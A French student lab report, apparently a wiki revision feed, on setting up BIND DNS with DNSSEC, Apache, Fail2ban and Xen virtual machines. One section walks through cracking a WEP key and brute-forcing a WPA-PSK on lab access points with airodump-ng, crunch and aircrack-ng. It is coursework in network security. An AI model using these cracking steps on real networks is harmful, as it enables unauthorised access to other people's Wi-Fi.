    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &lt;br /&gt;
&lt;br /&gt;
De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12359</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12359"/>
		<updated>2026-02-23T13:34:34Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
